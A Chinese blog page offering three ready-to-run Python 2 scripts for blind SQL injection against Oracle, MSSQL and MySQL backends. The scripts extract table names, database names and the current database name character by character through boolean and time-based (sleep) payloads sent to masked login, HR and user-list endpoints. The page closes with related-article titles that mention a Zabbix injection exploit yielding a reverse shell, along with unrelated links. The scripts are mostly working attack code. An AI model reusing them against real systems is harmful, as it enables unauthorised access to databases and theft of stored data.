【实战】SQL注入小脚本
1、ORACLE布尔型盲注
import urllib import urllib2 import requests payloads = '_ABCDEFGHIJKLMNOPQRSTUVWXYZ' header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' } values={} print 'Start to retrive database:' database= '' #需要先手工判断当前表名长度 for i in range(1, 21): for payload in payloads: try: values[' values[' values['phoneNumber']="' or (select substr(table_name,%s,1) from user_tables where rownum=1)='%s' and '1'='1" % (str(i),str(payload)) data = urllib.urlencode(values) url = "https://xxx.xxx.xxx.xxx/api/xxx/reg/action/xxx/appUserLogin.json" req = urllib2.Request(url,data=data,headers=header) resp = urllib2.urlopen(req).read() #匹配关键字输出正确的数据库名 if "status" in resp: database += payload print 'the database is:'+ database break else: print 'dumping database...' except Exception,e: print e
2、MSSQL布尔型盲注
import urllib import urllib2 import requests payloads = 'abcdefghijklmnopqrstuvwxyz_' header = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','Cookie':'ASP.NET_SessionId=4vmyjpbw03vk2aq0q5mlbemy'} values={} print 'Start to retrive database:' user= '' length=[] databases=[] db='' #注出数据库 def dump_db(i,j): global db for n in range(1,j+1): for payload in payloads: try: values['txtMemberName']="xxx%' and (select count(*) from master.dbo.sysdatabases where dbid={0} and substring(name,{1},1)='{2}')=1--".format(i,n,payload) data = urllib.urlencode(values) url = "http://xxx.xxx.xxx/HR/xxx/xxx.aspx" req = urllib2.Request(url,data=data,headers=header) resp = urllib2.urlopen(req).read() if "Robert" in resp: db += payload print db if n == j: databases.append(db) db='' break else: print 'dumping database...' except Exception,e: print e #遍历判断数据库的长度,需要手工判断数据库个数 for i in range(1,19): for j in range(1,16): try: values['txtMemberName']="xxx%' and (select count(*) from master.dbo.sysdatabases where dbid={0} and len(name)={1})=1--".format(i,j) data = urllib.urlencode(values) url = "http://xxx.xxx.xxx/HR/xxx/xxx.aspx" req = urllib2.Request(url,data=data,headers=header) #print req resp = urllib2.urlopen(req).read() #print resp if "Robert" in resp: print 'the length of DB_%s is %s' % (str(i),str(j)) dump_db(i,j) #print 'the DB is: %s' % str(db) length.append(j) break else: print 'dumping length...' except Exception,e: print e print '-------------------------' for ddd in range(0,17): print databases[ddd] print '-------------------------'
3、MYSQL基于时间的盲注
import urllib import urllib2 import time payloads = 'abcdefghijklmn@_.opqrstuvwxyz0123456789' header = {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'} values={} print 'Start to retrive database:' database= '' for i in range(1, 6): for payload in payloads: try: values['pageSize']=10 values['pageNum']=1 values['isAsc']='asc' values['orderByColumn']="(select*from(select(if(ascii(mid(database(),%s,1))=%s,sleep(2),1)))a)" % (i,ord(payload)) data = urllib.urlencode(values) url = "https://xxx.xxx.xxx/system/user/list" t_s = time.time() request = urllib2.Request(url,data,headers=header) response = urllib2.urlopen(request,timeout=5) t_e = time.time() if((t_e-t_s)>2): database += payload print 'the database() is:\t' + database time.sleep(2.0) break else: print 'dumping......' except: pass
【实战】SQL注入小脚本的更多相关文章
- zabbix(sql注入判断脚本)
zabbix(sql注入判断脚本) #-*-coding:utf-8-*- # code by anyun.org import urllib import re def getHtml(url): ...
- Zabbix sql注入漏洞脚本执行反弹shell
exp检测是否存在SQL注入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+------------------------------------ ...
- 实战SQL注入
SQL注入是啥就不解释了.下面演示一个SQL注入的例子 SQL注入点可以自己尝试或用SQL注入漏洞扫描工具去寻找,这里用大名鼎鼎的sqlmap演示一个现成的案例. 1.漏洞试探 root@kali:~ ...
- python打造一个分析网站SQL注入的脚本
前言: 昨天晚上其实就已经写完代码.只不过向FB投稿了,打算延迟一晚上在写博客 所有才到今天早上写.好了,接下来进入正题. 思路: 1.从网站源码中爬取那些类适于:http://xxx.com/xx. ...
- python SQL注入测试脚本(更新中)
import requests import json import warnings warnings.filterwarnings("ignore") url = 'https ...
- sql注入小姿势
利用/*!union*/可以绕过对union的过滤
- SQL注入不简单?那是你没有懂它的原理~
我们真的了解SQL注入吗? 不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动.在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏 ...
- Web安全学习笔记 SQL注入下
Web安全学习笔记 SQL注入下 繁枝插云欣 --ICML8 SQL注入小技巧 CheatSheet 预编译 参考文章 一点心得 一.SQL注入小技巧 1. 宽字节注入 一般程序员用gbk编码做开发的 ...
- MySQL SQL 注入
如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题. 本博文将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符. 所谓SQL注入,就是 ...
随机推荐
- 【转载】 clusterdata-2011-2 谷歌集群数据分析(三)
原文地址: https://blog.csdn.net/yangss123/article/details/78306270 由于原文声明其原创文章不得允许不可转载,故这里没有转载其正文内容. --- ...
- IDEA Git 修改后的文件无法Commit
转自:https://blog.csdn.net/moneyshi/article/details/81298861 因对IDEA使用不熟,在使用和配置GIT的时候,可能哪里配置错误,导致我一直无法使 ...
- linux下配置face_recognition
1.如linux下已有python2.7,但需要更新一下python 2.7至python2.x sudo add-apt-repository ppa:fkrull/deadsnakes-pytho ...
- python对 windows系统监控插件
在python编程的windows系统监控中,需要监控监控硬件信息需要两个模块:WMI 和 pypiwin32 .
- AD域策略启动关机脚本不执行的注意事项
其实主要是脚本路径的问题. 错误一: 直接使用右侧的添加按钮,添加了预控的本地路径.如上图第二行. 错误二: 直接使用右侧的添加按钮,添加了脚本的网络路径,如上图第三行. 正确的方法: 点击下方的显示 ...
- JAVA视频压缩
https://www.cnblogs.com/chuanyueinlife/p/9014627.html
- ASP.NET MVC路由配置详解
命名参数规范+匿名对象 routes.MapRoute( name: "Default", url: "{controller}/{action}/{id}", ...
- 第07组 Alpha冲刺(3/4)
队名:秃头小队 组长博客 作业博客 组长徐俊杰 过去两天完成的任务:完成人员分配,初步学习Android开发 Github签入记录 接下来的计划:继续完成Android开发的学习,带领团队进行前后端开 ...
- Ubuntu18.04彻底删除MySQL数据库
首先在终端中查看MySQL的依赖项:dpkg --list|grep mysql 卸载: sudo apt-get remove mysql-common 卸载:sudo apt-get autore ...
- php生成0~1随机小数方法
php生成0~1随机小数方法JavaScript生成0~1随机小数的方法可以调用自带的Math.random(); php生成0~1随机小数方法如下:<pre><?php/** * ...